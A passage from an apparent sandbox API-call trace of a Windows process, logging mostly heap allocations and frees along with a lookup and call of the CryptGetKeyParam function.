0x9c27d8 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0161.321] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0161.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.321] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.326] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0161.326] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c28c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0161.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.328] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 